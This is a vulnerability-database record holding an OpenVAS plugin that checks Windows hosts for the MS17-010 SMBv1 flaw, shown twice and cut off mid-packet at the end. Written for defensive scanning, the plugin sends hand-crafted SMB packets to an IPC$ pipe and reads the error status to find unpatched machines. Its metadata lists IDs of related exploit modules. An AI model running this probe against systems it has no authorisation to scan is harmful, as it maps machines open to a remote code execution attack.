+0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted SMB transaction request\n with fid = 0 and check the 
response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 x32/x64\n\n - Microsoft Windows Server 2012\n\n - Microsoft Windows Server 2016\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012 R2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! 
soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! 
smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! 
smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) +\n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 
0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB Session Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00,\n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02,\n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c,\n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. 
After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{\n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 9, "lastseen": "2020-06-05T17:28:22"}, {"bulletin": {"id": "OPENVAS:1361412562310810676", "hash": "f87b6d5b6fe3ffeff051672734d2b866afc064b1df4304c9d6741aa18e496ef4", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2019-05-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2019-05-29T18:34:28", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"modified": "2019-05-29T18:34:28", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": 
["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": 
["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:34:28", "value": 7.8, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB 
Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted SMB transaction request\n with fid = 0 and check the response to confirm the vulnerability.\");\n\n 
script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 x32/x64 Edition\n Microsoft Windows Server 2012 Edition\n Microsoft Windows Server 2016\n Microsoft Windows 8.1 x32/x64 Edition\n Microsoft Windows Server 2012 R2 Edition\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! 
soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! 
smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! 
smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) +\n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 